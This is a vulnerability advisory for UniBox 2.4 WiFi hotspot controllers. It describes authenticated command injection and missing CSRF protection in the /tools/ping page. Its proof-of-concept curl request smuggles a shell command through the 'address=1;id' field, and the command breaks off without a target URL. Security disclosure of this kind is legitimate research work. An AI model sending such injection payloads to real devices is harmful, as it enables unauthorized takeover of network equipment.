CVE-2020-21883:- Authenticated Remote Code Execution In Unibox 2.4

Authenticated Remote Code Execution In Unibox 2.4

 . contents:: Table Of Content


Title:- Authenticated command execution in all UNIBOX WiFi Hotspot Controller.
CVE ID:- Not Yet Assign
Author: Kaustubh G. Padwad
Vendor: Wifi-soft (
	 1.Unibox SMB
	 2.UniBox - Enterprise Series 
	 3.UniBox - Campus Series

Tested Version: Unibox U-50 | UniBox 2.4  (Respetive for others)
Severity: Critical

Advisory ID

About the Product:
UniBox is one of the most innovative and reliable Hotspot Controllers in the market today. You can install UniBox to manage any sized WiFi network without having to replace any existing infrastructure. With UniBox, you don't need any other solution for managing WiFi access. It comes packed with features so just one box is enough to handle all the functions of WiFi hotspots.

An issue was discovered on Unibox SMB with Unibox 2.4 and poterntially respected all other  devices. There is Code Execution vulnerability via /tools/ping Function in device which leads to complete device takeover.

Additional Information
The page /tools/ping can be tricked via specially crafted request which will leads to the code execution on device also device  does not validate the csrftoken,hence By combining this two attack we can form the Authencated remote code execution on device leads to complete device takeover.

[Vulnerability Type]
Remote Code Execution (RCE)
Cross Site Request Forgery (CSRF)

How to Reproduce: (POC):
curl -i -s -k  -X $'POST' \
    -H $'Host:' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer:' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 25' -H $'Connection: close' -H $'Cookie: PHPSESSID=k4l9or0l5xxxxxxxxxxx' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=k4l9oxxxxxxxxxx' \
    --data-binary $'pingaction=1&address=1;id' \